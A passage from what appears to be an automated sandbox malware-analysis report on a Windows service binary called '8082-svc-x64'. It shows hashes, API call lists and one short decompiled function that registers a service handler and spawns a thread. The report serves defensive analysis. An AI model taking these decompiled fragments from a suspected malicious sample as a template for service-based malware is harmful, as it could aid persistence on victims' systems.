          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: QueryVirtual$__iob_func
          • String ID: Address %p has no image-section$Mingw-w64 runtime failure:
          • API String ID: 830446740-3215938747
          • Opcode ID: 11f8344743db9335b068c0ccbe57145f8aff73dab604a69fde55688215150dbb
          • Instruction ID: 3443046c56344b1f3eb48678ed28b2076be9aadf8acb61c7a92a91f5610818b4
          • Opcode Fuzzy Hash: 11f8344743db9335b068c0ccbe57145f8aff73dab604a69fde55688215150dbb
          • Instruction Fuzzy Hash: 7B01A232604B4860D610AB53B84179ABF28A79E7D4F584136FE4827B96DA3CC286C704
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 46%
          			E00401A37(long long __rax) {
          				int _t2;
          				void* _t5;
          				void* _t6;
          				void* _t7;
          
          				 *0x44aa00 = 0x30;
          				 *0x44aa04 = 2;
          				 *0x44aa08 = 5;
          				 *0x44aa0c = 0;
          				 *0x44aa10 = 0;
          				 *0x44aa14 = 0;
          				 *0x44aa18 = 0;
          				_t2 = RegisterServiceCtrlHandlerA(??, ??);
          				 *0x44a9f0 = __rax;
          				if(__rax != 0) {
          					_t2 = E00401955(_t5, _t6, _t7, __rax);
          					ExitProcess(??);
          				}
          				return _t2;
          			}







          0x00401a3b
          0x00401a45
          0x00401a56
          0x00401a60
          0x00401a71
          0x00401a7b
          0x00401a85
          0x00401a8f
          0x00401a98
          0x00401a9f
          0x00401aa3
          0x00401aaa
          0x00401aaa
          0x00401ab5

          APIs
          • RegisterServiceCtrlHandlerA.ADVAPI32 ref: 00401A8F
            • Part of subcall function 00401955: GetTickCount.KERNEL32 ref: 00401959
            • Part of subcall function 00401955: CreateThread.KERNEL32 ref: 004019E2
          • ExitProcess.KERNEL32 ref: 00401AAA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: CountCreateCtrlExitHandlerProcessRegisterServiceThreadTick
          • String ID: DceRpcSs
          • API String ID: 1761743205-292928688
          • Opcode ID: fc4bbc9d8fc1c0ceaeb450da0adfbc9aab21f16672a555df5927c8beef1b4582
          • Instruction ID: 20e1aff3e82d261fe453e2693d5f26814d49d4f5a2d736e4db67f184d88fd4fa
          • Opcode Fuzzy Hash: fc4bbc9d8fc1c0ceaeb450da0adfbc9aab21f16672a555df5927c8beef1b4582
          • Instruction Fuzzy Hash: 44F0ACF024674096F705DF21FE5931637A0B708306F808519C20A667A1DBBD8169CB9A
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: CriticalSection$EnterLeavefree
          • String ID:
          • API String ID: 4020351045-0
          • Opcode ID: 545c16c45322939c092fb185b0bc4a33db0f94b8ff8325428ca366f3d2b44c77
          • Instruction ID: 685eacec7b8a546341f4a75773148f97976bdf31423b58f8f8462ecc0cb59cc8
          • Opcode Fuzzy Hash: 545c16c45322939c092fb185b0bc4a33db0f94b8ff8325428ca366f3d2b44c77
          • Instruction Fuzzy Hash: 07017CF1302B0082EF18CF51E89032A27A8E798B91F558836CA09933A4DB3CCA95C349
          Uniqueness

          Uniqueness Score: -1.00%